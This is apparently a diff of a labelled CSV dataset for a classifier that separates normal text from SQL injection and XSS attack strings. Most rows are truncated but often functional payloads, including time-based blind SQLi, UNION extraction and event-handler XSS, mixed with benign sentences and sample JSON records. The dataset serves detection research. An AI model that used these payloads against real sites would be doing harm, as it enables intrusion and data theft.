1,500000",2,SQLi,19917 +1' ) ) as xkiq where 9008 = 9008 and sleep ( 5 ) -,2,SQLi,20832 +"<object data=""javascript:alert()"">",1,XSS,2139 +transaction,0,normal,23174 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10831 +-8665' or 6825 = 7840 and 'vbsy' like 'vbsy,2,SQLi,12211 +1'|| ( select 'wyng' from dual where 2157 = 2157 u,2,SQLi,12292 +"?goto=javascript:alert(1)"",",1,XSS,9876 +1'+ ( select vvet where 5221 = 5221 and exp ( ~ ( ,2,SQLi,21926 +end and ( ( ( 'hwrs' like 'hwrs,2,SQLi,16492 +I want to select a course for professional develop,0,normal,23698 +1 ) ) as jrzr where 5194 = 5194 and char ( 107 ) |,2,SQLi,13470 +"<center draggable=""true"" ondragleave=""alert(1)"">te",1,XSS,6897 +"or ""&",2,SQLi,9887 +<style>:target {transform: rotate(180deg);}</style,1,XSS,3613 +Select your promise.,0,normal,24951 +"<main oncut=""alert(1)"" contenteditable>test</main>",1,XSS,7154 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,17350 +<multicol onfocusout=alert(1) tabindex=1 id=x></mu,1,XSS,6015 +1' or 7552 = ( select count ( * ) from rdb$fields ,2,SQLi,13648 +select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,14116 +"<xmp onmousemove=""alert(1)"">test</xmp>",1,XSS,4885 +1'+ ( select rhlb where 9477 = 9477,2,SQLi,16527 +1 ) ( select ( case when ( 4587 = 4587 ) then rege,2,SQLi,13079 +1%' ) ) ) or 4411 = ( select count ( * ) from sysu,2,SQLi,12614 +select * from users where id = 1 or ( 1 ) = 1 unio,2,SQLi,12049 +<rt id=x tabindex=1 onactivate=alert(1)></rt>,1,XSS,4149 +"<p onpaste=""alert(1)"" contenteditable>test</p>",1,XSS,8909 +Locate items where valid.,0,normal,23323 +"<multicol onmouseleave=""alert(1)"">test</multicol>",1,XSS,6545 +1' and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ,2,SQLi,21630 +"<code oncut=""alert(1)"" contenteditable>test</code>",1,XSS,4434 +"Tap on ""see more,"" then select the SmileCode Scann",0,normal,25504 "<body onPopState body onPopState=""javascript:javas",1,XSS,407 -Select locate.,0,normal,24597 -Making your own cover is a great way to truly pers,0,normal,25895 -1' ) ) ) and char ( 111 ) ||char ( 77 ) ||char ( 1,2,SQLi,13179 -1%' ) rlike ( select ( case when ( 1210 = 8664 ) t,2,SQLi,16174 -"1"" ) ) as jikg where 8258 = 8258 and ( 3973 = 1047",2,SQLi,21830 -<isindex id=x tabindex=1 onfocus=alert(1)></isinde,1,XSS,8235 -"and 0=benchmark(3000000,MD5(1))%20--",2,SQLi,11023 -"1 where 7072 = 7072 or row ( 1045,7562 ) > ( selec",2,SQLi,14052 -""" ) ) or benchmark ( 10000000,MD5 ( 1 ) ) #",2,SQLi,11564 -select * from users where id = 1 union select 1<@$,2,SQLi,11557 -1%' or 7417 = ( select count ( * ) from sysibm.sys,2,SQLi,20784 -1' and 6969 = ( select 6969 from pg_sleep ( 5 ) ) ,2,SQLi,16354 -1' ) as znak where 5203 = 5203,2,SQLi,21637 +Select open.,0,normal,24599 +They could only be taken in Rome itself; and in ca,0,normal,25312 +1%' or ( select 2* ( if ( ( select * from ( select,2,SQLi,13181 +"-6906' where 1839 = 1839 union all select 1839,183",2,SQLi,16176 +"1"" ) as wjdc where 8694 = 8694 and 2853 = cast ( (",2,SQLi,21832 +<plaintext id=x tabindex=1 onbeforedeactivate=aler,1,XSS,8237 +""" and 0=benchmark(3000000,MD5(1))%20/*",2,SQLi,11025 +1 ) where 8433 = 8433 rlike ( select ( case when (,2,SQLi,14054 +select * from users where id = 1 or $ . = 1 union ,2,SQLi,11566 +select * from users where id = '1' or !<@ union se,2,SQLi,11559 +select ( case when ( 7822 = 4430 ) then 7822 else ,2,SQLi,20786 +1' where 4860 = 4860 or 5356 = ( select count ( * ,2,SQLi,16356 +1 ) ) as qgok where 3993 = 3993 and 3824 = benchma,2,SQLi,21639 "<video oncanplaythrough=alert(1)><source src=""vali",1,XSS,12 -"<image onmouseover=""alert(1)"">test</image>",1,XSS,4761 -"<IMG SRC=x ononline=""alert(String.fromCharCode(88,",1,XSS,1178 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10694 -"<iframe onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,2864 -"<hr onkeyup=""alert(1)"" contenteditable>test</hr>",1,XSS,6472 -Create a new playlist.,0,normal,22613 -"<input type=""submit"">",1,XSS,9219 -select * from users where id = 1 or ( \+ ) = 1 uni,2,SQLi,12041 -"<dialog onmouseover=""alert(1)"">test</dialog>",1,XSS,2990 -Where's the post office?,0,normal,23502 -AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR ',2,SQLi,11208 -"<option onkeyup=""alert(1)"" contenteditable>test</o",1,XSS,7011 -"admin"" ) or ( ""1"" = ""1""--",2,SQLi,11531 -1%' ) ) ) or 5286 = ( select count ( * ) from all_,2,SQLi,14438 -1 ) union all select null--,2,SQLi,22444 -"<label draggable=""true"" ondragleave=""alert(1)"">tes",1,XSS,8928 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,12593 --2820' ) ) or 6679 = 8848--,2,SQLi,17825 -"{""id"":null,""firstName"":""Sheryl"",""lastName"":""Lee"",""",0,normal,27273 -"<figcaption onkeypress=""alert(1)"" contenteditable>",1,XSS,2876 -"1 ) where 6784 = 6784 and elt ( 3114 = 3114,sleep ",2,SQLi,12179 -"<div id=""120""><script>function makePopups(){for (i",1,XSS,9109 -"<dt onmouseover=""alert(1)"">test</dt>",1,XSS,2191 -It was formed by men who were fierce Puritan enthu,0,normal,25951 -Where's the piercing studio?,0,normal,23617 -"<bdi onmousemove=""alert(1)"">test</bdi>",1,XSS,3727 -1' and ( 1088 = 7530 ) *7530 and 'xkfu' = 'xkfu,2,SQLi,19157 -1' ) where 1625 = 1625 and 3707 = ( select count (,2,SQLi,16839 -"<! foo=""[[[x]]""><x foo=""]foo><script>alert(91)</sc",1,XSS,9014 -"<style onbeforecut=""alert(1)"" contenteditable>test",1,XSS,8190 -&apos;&apos;;!--&quot;&lt;XSS&gt;=&amp;{()},1,XSS,1368 -"<select onclick=""alert(1)"">test</select>",1,XSS,3713 -"<datalist onkeydown=""alert(1)"" contenteditable>tes",1,XSS,5451 -"1"" ) as xsgx where 5239 = 5239 union all select nu",2,SQLi,17773 -"1%"" ) and 8635 = ( select count ( * ) from generat",2,SQLi,15639 +<caption onpointerover=alert(1)>XSS</caption>,1,XSS,4763 +"<IMG SRC=x onoffline=""alert(String.fromCharCode(88",1,XSS,1179 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10696 +"<font onclick=""alert(1)"">test</font>",1,XSS,2865 +<isindex type=image onload=alert(1) src=validimage,1,XSS,6474 +Modify the color scheme.,0,normal,22615 +<isindex action=javascript:alert(1) type=submit va,1,XSS,9221 +"select * from users where id = 1 or ""; ) "" = 1 or ",2,SQLi,12043 +<animate onpointermove=alert(1)>XSS</animate>,1,XSS,2991 +Where's the grocery store?,0,normal,23504 +RLIKE SLEEP(5)-- 1337,2,SQLi,11210 +"<plaintext draggable=""true"" ondrag=""alert(1)"">test",1,XSS,7013 +", exec xp_regread",2,SQLi,11533 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,14440 +1 where 6040 = 6040 and 9660 = ( select count ( * ,2,SQLi,22446 +<i id=x tabindex=1 onfocusin=alert(1)></i>,1,XSS,8930 +"1"" ) as buky where 7898 = 7898 or 1022 = ( select ",2,SQLi,12595 +"1"" and 8407 = ( select count ( * ) from generate_s",2,SQLi,17827 +"{""id"":null,""name"":""unknown tape""}",0,normal,27271 +<section onpointerdown=alert(1)>XSS</section>,1,XSS,2877 +1 ) and 4595 = 4595#,2,SQLi,12181 +"<div id=""122""><iframe sandbox=""allow-same-origin a",1,XSS,9111 +"<nextid draggable=""true"" ondrag=""alert(1)"">test</n",1,XSS,2192 +"{""id"":null,""firstName"":""Angeline"",""lastName"":""Tan""",0,normal,27091 +Where's the massage parlor?,0,normal,23619 +<element onpointermove=alert(1)>XSS</element>,1,XSS,3729 +"1' and make_set ( 4952 = 7129,7129 )",2,SQLi,19159 +"1 ) ) union all select null,null#",2,SQLi,16841 +"<!-- injection --><svg height=""50px"">",1,XSS,9016 +<audio onfocusout=alert(1) tabindex=1 id=x></audio,1,XSS,8192 +&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt,1,XSS,1369 +"<element draggable=""true"" ondragstart=""alert(1)"">t",1,XSS,3715 +"<listing oncopy=""alert(1)"" contenteditable>test</l",1,XSS,5453 +1%' and char ( 120 ) ||char ( 106 ) ||char ( 117 ),2,SQLi,17775 +"1' ) where 1093 = 1093 and extractvalue ( 7982,con",2,SQLi,15641 "&lt;DIV STYLE=\""background-image&#58; url(javascri",1,XSS,1001 -<param onpointerenter=alert(1)>XSS</param>,1,XSS,7762 -"<nextid onmouseleave=""alert(1)"">test</nextid>",1,XSS,3554 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,4115 -"<;A HREF="";http://%77%77%77%2E%67%6F%6F%67%6C%65%2",1,XSS,1668 -"<address oncontextmenu=""alert(1)"">test</address>",1,XSS,3174 --4498 ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ,2,SQLi,15741 -"{""id"":7493,""name"":""for jmeter test to work <DO NOT",0,normal,26804 +<font id=x tabindex=1 onfocusin=alert(1)></font>,1,XSS,7764 +<head onpointerdown=alert(1)>XSS</head>,1,XSS,3556 +<image2 onpointermove=alert(1)>XSS</image2>,1,XSS,4117 +"<;A HREF="";http://1113982867/"";>;XSS<;/A>;",1,XSS,1669 +<summary onpointerover=alert(1)>XSS</summary>,1,XSS,3176 +1'|| ( select 'byxb' where 8351 = 8351 and 2853 = ,2,SQLi,15743 +"{""id"":7493,""name"":""for jmeter test to work <DO NOT",0,normal,26801 "<a href=""\x0Bjavascript:javascript:alert(1)"" id=""f",1,XSS,489 -"1"" ) ) and 5556 = ( select count ( * ) from all_us",2,SQLi,19615 -"1"" where 6352 = 6352",2,SQLi,20213 -"Roebuck, the Radical member for Sheffield, gave no",0,normal,25741 --4085'+ ( select aipn where 5493 = 5493 union all ,2,SQLi,12976 -call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,21593 -<sub onpointerup=alert(1)>XSS</sub>,1,XSS,7849 -"<optgroup oncut=""alert(1)"" contenteditable>test</o",1,XSS,5705 -"{""id"":null,""firstName"":""Zi"",""lastName"":""Jian"",""add",0,normal,27550 -<form id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,8134 -"1"" ) where 4951 = 4951",2,SQLi,17088 -<br id=x tabindex=1 onfocusin=alert(1)></br>,1,XSS,5106 -Home Depot: Up to 50% off select patio furniture; ,0,normal,26090 -<nav id=x tabindex=1 onbeforeactivate=alert(1)></n,1,XSS,3292 -<style>@keyframes slidein {}</style><basefont styl,1,XSS,8126 -"select * from users where id = 1 or ""1["" or 1 = 1 ",2,SQLi,11866 -"1' union all select null,null#",2,SQLi,13381 -"javascript:/*""/*'/*\""/*`/*><frame src=javascript:a",1,XSS,9520 -"{""id"":null,""name"":""Pignite""}",0,normal,27121 -"1"" ) or sleep ( 5 ) and ( ""fiag"" like ""fiag",2,SQLi,13966 -1'+ ( select tzvm where 5145 = 5145 and 4192 = 743,2,SQLi,14288 --6030%' ) or 3038 = 3038,2,SQLi,13599 -COM: up to 70 percent off luxury labels Michael Ko,0,normal,26272 -if ( 3392 = 4422 ) select 3392 else drop function ,2,SQLi,21294 -"<style>@keyframes x{}</style><code style=""animatio",1,XSS,4441 -1 or 1=1,2,SQLi,10056 -select ( case when ( 5704 = 4125 ) then 5704 else ,2,SQLi,17371 -"{""id"":null,""firstName"":"""",""lastName"":""Brolagda"",""s",0,normal,26947 -select,0,normal,26582 -"{""id"":null,""name"":""Bronzor""}",0,normal,26861 -Select a skincare product to try.,0,normal,24090 -1'|| ( select 'rhcv' where 6228 = 6228,2,SQLi,15505 -Join the hiking adventure.,0,normal,22642 -"-6851' ) or 1570 = convert ( int, ( select char ( ",2,SQLi,22474 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,15578 -"<dl oncut=""alert(1)"" contenteditable>test</dl>",1,XSS,5239 -"1', ( begin if ( 8340 = 8340 ) then dbms_lock.slee",2,SQLi,14647 --2432' ) ) or ( 8459 = 8459 ) *4906 and ( ( 'ejhp',2,SQLi,15553 -1' where 1844 = 1844,2,SQLi,17583 -"-3234%"" ) ) or elt ( 1032 = 1032,3623 ) and ( ( ""%",2,SQLi,12374 -As the brushes are slowly shifted over on the revo,0,normal,26348 -"1%' ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,13670 -<th onfocusout=alert(1) tabindex=1 id=x></th><inpu,1,XSS,7520 -time,0,normal,23197 -or 1=1 –,2,SQLi,9992 -"<image xlink:href=""data:image/svg+xml,%3Csvg xmlns",1,XSS,9207 -Select van.,0,normal,24705 -"><img src=x:x"" onerror=""alert(XSS)"">",1,XSS,9557 -AND 7506=9091 AND ('5913=5913,2,SQLi,10226 -Where's the condo?,0,normal,23560 -"<FRAME SRC=""javascript:alert('')",1,XSS,4471 -"1' ) ) union all select null,null,null,null,null,n",2,SQLi,17276 -#ERROR!,2,SQLi,10986 -<style>:target {transform: rotate(180deg);}</style,1,XSS,1970 -"1"" ) where 4567 = 4567 or 8156 = ( select count ( ",2,SQLi,12596 -"<blockquote draggable=""true"" ondragend=""alert(1)"">",1,XSS,5758 -"She asked, ""Where is my missing sock?""",0,normal,22912 -<command id=x tabindex=1 onbeforeactivate=alert(1),1,XSS,6295 -"1%"" or 1022 = ( select count ( * ) from all_users ",2,SQLi,12116 -1 where 3410 = 3410 or 7552 = ( select count ( * ),2,SQLi,13606 -<span onfocusout=alert(1) tabindex=1 id=x></span><,1,XSS,7596 -"<div id=""122""><iframe sandbox=""allow-same-origin a",1,XSS,9111 -<style>@keyframes slidein {}</style><spacer style=,1,XSS,3250 -"<style draggable=""true"" ondragend=""alert(1)"">test<",1,XSS,6571 -<style>:target {transform: rotate(180deg);}</style,1,XSS,6639 -Can you help me choose where to dine tonight?,0,normal,23736 -1%',2,SQLi,21727 -"1%"" ) or row ( 1045,7562 ) > ( select count ( * ) ",2,SQLi,15399 -Can you help me decide where to go for dinner?,0,normal,23858 -"1%"" ) ) ) union all select null#",2,SQLi,12505 +"1"" ) where 3084 = 3084 union all select null,null-",2,SQLi,19617 +"-4695' ) ) ) union all select 5844,5844,5844,5844,",2,SQLi,20215 +Rosehill House - Situated in a secluded select are,0,normal,25738 +1' ) as rqzz where 4987 = 4987 or char ( 68 ) ||ch,2,SQLi,12978 +-8521'+ ( select ucim where 9003 = 9003 union all ,2,SQLi,21595 +"<sup onpaste=""alert(1)"" contenteditable>test</sup>",1,XSS,7851 +"<command onmouseup=""alert(1)"">test</command>",1,XSS,5707 +"{""id"":null,""firstName"":""Edmond"",""lastName"":""Tan"",""",0,normal,27131 +"<acronym onbeforecopy=""alert(1)"" contenteditable>t",1,XSS,8136 +-3666' ) where 6386 = 6386 union all select 6386--,2,SQLi,17090 +"<style>@keyframes slidein {}</style><video style=""",1,XSS,5108 +"Home Depot: Save up to 40% off select bedding, bat",0,normal,26087 +"<hr onmouseover=""alert(1)"">test</hr>",1,XSS,3294 +<font onpointermove=alert(1)>XSS</font>,1,XSS,8128 +"select * from users where id = 1 or 1#""1 union sel",2,SQLi,11868 +1' in boolean mode ) and 3824 = benchmark ( 500000,2,SQLi,13383 +"javascript:'/*`/*'/*""/*\""/*<FRAME SRC= javascript:",1,XSS,9522 +"{""id"":null,""firstName"":""Meiyuke"",""lastName"":""Soh"",",0,normal,27119 +"-9941 union all select 1321,1321,1321,1321,1321,13",2,SQLi,13968 +"-4148%"" ) ) ) or ( 8459 = 8459 ) *4906 and ( ( ( """,2,SQLi,14290 +1 and 8407 = ( select count ( * ) from generate_se,2,SQLi,13601 +Container Store: 225% off select closet essentials,0,normal,26269 +1 where 6494 = 6494 and 8463 = 2760,2,SQLi,21296 +"<style>@keyframes slidein {}</style><big style=""an",1,XSS,4443 +)%20or%20('x'='x,2,SQLi,10058 +"1%"" ) order by 1--",2,SQLi,17373 +"{""id"":null,""name"":""typical""}",0,normal,26944 +select,0,normal,26579 +"{""id"":null,""firstName"":""Ann"",""lastName"":""Ang"",""spe",0,normal,26788 +Select a book to read during the journey.,0,normal,24092 +"1' ) ) ) and make_set ( 8403 = 8403,8899 ) and ( (",2,SQLi,15507 +Sort the puzzle pieces.,0,normal,22644 +1' ) ) ) and sleep ( 5 ) and ( ( ( 'vbck' like 'vb,2,SQLi,22476 +"1"" ) as oztl where 6655 = 6655 or 8315 = ( select ",2,SQLi,15580 +"<tt onkeydown=""alert(1)"" contenteditable>test</tt>",1,XSS,5241 +"-2009%' union all select 1991,1991#",2,SQLi,14649 +"-3249' ) ) ) union all select 6309,6309#",2,SQLi,15555 +1' ) as nftr where 8825 = 8825 or ( select * from ,2,SQLi,17585 +1 where 9872 = 9872,2,SQLi,12376 +"As you select books to place into the basket, cons",0,normal,26345 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,13672 +"<multicol oncopy=""alert(1)"" contenteditable>test</",1,XSS,7522 +interval,0,normal,23199 +") or 1""=""1""--",2,SQLi,9994 +<img alt='%></xmp><img src=xx:x onerror=aler,1,XSS,9209 +Select taxi.,0,normal,24707 +%0ajavascript:`/*\/*-->&lt;svg onload='/*</templat,1,XSS,9559 +AND 7300=7300 AND 'pKlZ'='pKlY,2,SQLi,10228 +Where's the houseboat?,0,normal,23562 +"<b oncontextmenu=""alert(1)"">test</b>",1,XSS,4473 +"-2912"" ) as eizh where 2223 = 2223 or make_set ( 1",2,SQLi,17278 +#ERROR!,2,SQLi,10988 +"<dl onbeforecopy=""alert(1)"" contenteditable>test</",1,XSS,1971 +"1' ) procedure analyse ( extractvalue ( 5840,conca",2,SQLi,12598 +<style>:target {color: red;}</style><output id=x s,1,XSS,5760 +Sort the colorful beads into different piles.,0,normal,22914 +<script id=x tabindex=1 ondeactivate=alert(1)></sc,1,XSS,6297 +( 1589 = 1589 ) *1,2,SQLi,12118 +"1 ) and 3824 = benchmark ( 5000000,md5 ( 0x7655564",2,SQLi,13608 +"<dt onbeforecut=""alert(1)"" contenteditable>test</d",1,XSS,7598 +"<div id=""124""><script src=""/\example.com\foo.js""><",1,XSS,9113 +<title id=x tabindex=1 onbeforeactivate=alert(1)><,1,XSS,3252 +<object onpointerover=alert(1)>XSS</object>,1,XSS,6573 +"<applet onmousemove=""alert(1)"">test</applet>",1,XSS,6641 +I'm considering where to spend the weekend.,0,normal,23738 +"-3731' ) ) ) or elt ( 7540 = 1412,1412 ) and ( ( (",2,SQLi,21729 +"1 ) and elt ( 4249 = 4249,7259 ) and ( 8226 = 8226",2,SQLi,15401 +Let's decide where to go for our next outing.,0,normal,23860 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,12507 "<script>throw onerror=eval,e=new Error,e.message='",1,XSS,126 -1' ) ) ) or 9643 = ( select count ( * ) from domai,2,SQLi,16171 -"<basefont onkeyup=""alert(1)"" contenteditable>test<",1,XSS,5371 -"<IMG SRC=x onshow=""alert(String.fromCharCode(88,83",1,XSS,1240 -"<output onmouseout=""alert(1)"">test</output>",1,XSS,2290 -"1"" ) ) and 3707 = ( select count ( * ) from sysibm",2,SQLi,19125 -"<td oncopy=""alert(1)"" contenteditable>test</td>",1,XSS,8468 -1 ) and 8594 = ( select 8594 from pg_sleep ( 5 ) ),2,SQLi,20970 -"<IMG SRC=x onplaying=""alert(String.fromCharCode(88",1,XSS,1230 -<iframe src=`http://xssme.html5sec.org/?xss=<ifram,1,XSS,9201 -"<body onkeypress=""alert(1)"" contenteditable>test</",1,XSS,6981 -"<link onmouseleave=""alert(1)"">test</link>",1,XSS,5179 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10725 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,20678 -"&lt;A HREF=\""http&#58;//google&#46;com/\""&gt;XSS&l",1,XSS,1059 -<s id=x tabindex=1 onfocus=alert(1)></s>,1,XSS,6263 -1' ) ) ) and 4595 = 4595#,2,SQLi,15361 +"1"" and 6414 = ( select count ( * ) from rdb$fields",2,SQLi,16173 +"<span onmouseleave=""alert(1)"">test</span>",1,XSS,5373 +"<IMG SRC=x ontoggle=""alert(String.fromCharCode(88,",1,XSS,1241 +"<basefont draggable=""true"" ondragenter=""alert(1)"">",1,XSS,2291 +"1 where 7158 = 7158 or elt ( 5873 = 5873,sleep ( 5",2,SQLi,19127 +"<command onbeforecut=""alert(1)"" contenteditable>te",1,XSS,8470 +"-4346' ) or 1 group by concat ( 0x7171706a71, ( se",2,SQLi,20972 +"<IMG SRC=x onprogress=""alert(String.fromCharCode(8",1,XSS,1231 +<iframe src=mhtml:http://html5sec.org/test.gif!xss,1,XSS,9203 +"<bgsound draggable=""true"" ondragleave=""alert(1)"">t",1,XSS,6983 +"<tr draggable=""true"" ondragenter=""alert(1)"">test</",1,XSS,5181 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10727 +-9370' ) where 7070 = 7070 or make_set ( 9354 = 93,2,SQLi,20680 +"&lt;A HREF=\""http&#58;//www&#46;google&#46;com&#46",1,XSS,1060 +<multicol onpointerdown=alert(1)>XSS</multicol>,1,XSS,6265 +"1"" ) as ymto where 3453 = 3453",2,SQLi,15363 "<XSS STYLE=""behavior: url(xss.htc);"">",1,XSS,282 -"-2916"" ) ) or 4946 = 8232--",2,SQLi,14847 +-6712' ) ) as kqff where 9146 = 9146 or 5903 = ( ',2,SQLi,14849 LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;,1,XSS,969 -1 ) ) as tbiq where 7159 = 7159 and 8635 = ( selec,2,SQLi,16002 -select ( case when ( 5418 = 6516 ) then 1 else 541,2,SQLi,20338 -"<style>@keyframes x{}</style><shadow style=""animat",1,XSS,1940 -"{""id"":null,""name"":""Hyena""}",0,normal,27263 -1' where 8869 = 8869 and 8312 = dbms_pipe.receive_,2,SQLi,17659 +1 where 8333 = 8333 and 6055 = ctxsys.drithsx.sn (,2,SQLi,16004 +select pg_sleep ( 5 ),2,SQLi,20340 +"<bdi onkeyup=""alert(1)"" contenteditable>test</bdi>",1,XSS,1941 +"{""id"":null,""name"":""adventure parts""}",0,normal,27261 +1'+ ( select xzvf where 9727 = 9727,2,SQLi,17661 <video poster=javascript:javascript:alert(1)//,1,XSS,620 -1'|| ( select 'nbmo' from dual where 5572 = 5572 a,2,SQLi,18310 -"<style onmouseleave=""alert(1)"">test</style>",1,XSS,1743 -1%' and char ( 120 ) ||char ( 106 ) ||char ( 117 ),2,SQLi,17775 -"1' ) union all select null,null,null,null,null--",2,SQLi,18588 -"-2610%"" ) union all select 7779,7779,7779,7779,777",2,SQLi,14136 -<svg onload=(alert)(1) >//INJECTX,1,XSS,9848 -"<mark onmousemove=""alert(1)"">test</mark>",1,XSS,3569 --4322' ) ) as magw where 1627 = 1627 or 4747 = dbm,2,SQLi,15564 -<th onpointerover=alert(1)>XSS</th>,1,XSS,6117 +1'+ ( select 'mtpt' where 7483 = 7483 union all se,2,SQLi,18312 +<svg><meta onload=alert(1)></meta>,1,XSS,1744 +"1 ) where 8856 = 8856 or 6979 = like ( 'abcdefg',u",2,SQLi,17777 +"1' and extractvalue ( 7982,concat ( 0x5c,0x7171706",2,SQLi,18590 +1 ) ) or 2633 = dbms_pipe.receive_message ( chr ( ,2,SQLi,14138 +"<!--<img src=""--><img src=x onerror=alert(1)//"">//",1,XSS,9850 +"<dl onbeforepaste=""alert(1)"" contenteditable>test<",1,XSS,3571 +end and ( 4610 = 4610,2,SQLi,15566 +"<image draggable=""true"" ondrag=""alert(1)"">test</im",1,XSS,6119 "{""id"":null,""name"":""notice""}",0,normal,27580 -"1%"" ) ) and 2716 = ( select count ( * ) from sysus",2,SQLi,22437 -<listing onpointermove=alert(1)>XSS</listing>,1,XSS,3179 -select ( case when ( 8663 = 7467 ) then 8663 else ,2,SQLi,19577 -"javascript:/*`//'//\""//</style></noscript></script",1,XSS,9500 -"<tr draggable=""true"" ondrag=""alert(1)"">test</tr>",1,XSS,6100 -Where's your SQL information?,0,normal,23414 -"1,updatexml ( 2917,concat ( 0x2e,0x7171706a71, ( s",2,SQLi,16960 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10553 -Update feed.,0,normal,23041 -Where's the taxi stand?,0,normal,23500 -"select sleep ( 5 ) and ( ( ""vzye"" = ""vzye",2,SQLi,13995 -It is a matter for the trustees to judge whether t,0,normal,25971 -1 ) as bgvd where 1753 = 1753 and 6510 = ( select ,2,SQLi,15636 -"<big onmouseover=""alert(1)"">test</big>",1,XSS,6277 -javascript:alert('XSS');,1,XSS,9473 -Each offers a handful of channels in the genre you,0,normal,26221 --5967 or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ),2,SQLi,13150 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11084 -1' ) ) as qovd where 8865 = 8865 and ( 3020 = 3020,2,SQLi,22282 -<svg id=x tabindex=1 onbeforeactivate=alert(1)></s,1,XSS,5725 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10832 -"1"" ) ) and 9800 = 8713",2,SQLi,16654 +1 ) ) ) rlike sleep ( 5 ) #,2,SQLi,22439 +<audio id=x controls onfocus=alert(1) id=x><source,1,XSS,3181 +1'+ ( select emeu where 2310 = 2310,2,SQLi,19579 +"javascript:/*-->'//""//`//\""//</title></textarea></",1,XSS,9502 +"<iframe ondblclick=""alert(1)"">test</iframe>",1,XSS,6102 +Where's your SQL dataset?,0,normal,23416 +"1%"" union all select null--",2,SQLi,16962 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10555 +Delete spam.,0,normal,23043 +Where's the post office?,0,normal,23502 +1'|| ( select 'exls' where 3837 = 3837 and sleep (,2,SQLi,13997 +It is evident that accurate knowledge of the chara,0,normal,25968 +1 ) ) as xyuy where 6894 = 6894,2,SQLi,15638 +<style>:target {color:red;}</style><details id=x s,1,XSS,6279 +javascript\x0A:javascript:alert(1),1,XSS,9475 +"Buy 1, get 1 free* on select Nature Made® vitamins",0,normal,26301 +1' ) where 9272 = 9272,2,SQLi,13152 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11086 +1'|| ( select 'mnvk' from dual where 4181 = 4181,2,SQLi,22284 +<address onpointerdown=alert(1)>XSS</address>,1,XSS,5727 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10834 +1' in boolean mode ) or 8315 = ( select count ( * ,2,SQLi,16656 "<!--<img src=""--><img src=x onerror=javascript:ale",1,XSS,630 -select * from users where id = 1 %$ . or 1 = 1 -- ,2,SQLi,11971 -"1 and 4241 = convert ( int, ( select char ( 113 ) ",2,SQLi,19466 -"1%"" ) ) or 8315 = ( select count ( * ) from sysibm",2,SQLi,19851 -<svg><kbd onload=alert(1)></kbd>,1,XSS,6431 -<svg><h1 onload=alert(1)></h1>,1,XSS,3375 -Where in the database?,0,normal,23447 -"1 union all select null,null,null,null,null,null,n",2,SQLi,12589 -"{""id"":null,""firstName"":""Goh"",""lastName"":""Katherine",0,normal,27593 -1' ) as gxfu where 9676 = 9676,2,SQLi,21928 -"1 ) ) union all select null,null,null,null#",2,SQLi,13761 -WHERE 1=1 AND 1=1#,2,SQLi,10239 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,20741 -"<tbody draggable=""true"" ondragleave=""alert(1)"">tes",1,XSS,2114 -Select paste.,0,normal,24604 -<colgroup id=x tabindex=1 onfocusin=alert(1)></col,1,XSS,3217 -1' and 4374 = 2305,2,SQLi,13126 -<textarea onpointerdown=alert(1)>XSS</textarea>,1,XSS,3815 -"<map oncut=""alert(1)"" contenteditable>test</map>",1,XSS,8322 -<h1 onpointermove=alert(1)>XSS</h1>,1,XSS,3156 -"-6667%"" ) ) union all select 7348,7348,7348,7348,7",2,SQLi,14297 -<embed id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,2279 -<style>:target {color: red;}</style><multicol id=x,1,XSS,4600 +1 ) ) or sleep ( __TIME__ ) #,2,SQLi,11973 +"-6084' ) ) or 1570 = convert ( int, ( select char ",2,SQLi,19468 +select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,19853 +<wbr onblur=alert(1) tabindex=1 id=x></wbr><input ,1,XSS,6433 +<style>:target {transform: rotate(180deg);}</style,1,XSS,3377 +Where to start the query?,0,normal,23449 +1' and exp ( ~ ( select * from ( select concat ( 0,2,SQLi,12591 +"{""id"":null,""firstName"":""Goh"",""lastName"":""Katherine",0,normal,27593 +-3297' or 4747 = dbms_utility.sqlid_to_sqlhash ( (,2,SQLi,21930 +"-8772%' union all select 4909,4909,4909,4909,4909,",2,SQLi,13763 +WHERE 1=1 AND 1=1--,2,SQLi,10241 +"1%"" or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||c",2,SQLi,20743 +<big onpointerleave=alert(1)>XSS</big>,1,XSS,2115 +Select undo.,0,normal,24606 +"<strong onmouseout=""alert(1)"">test</strong>",1,XSS,3219 +1'|| ( select 'mwmn' where 5112 = 5112 or ( select,2,SQLi,13128 +"<head 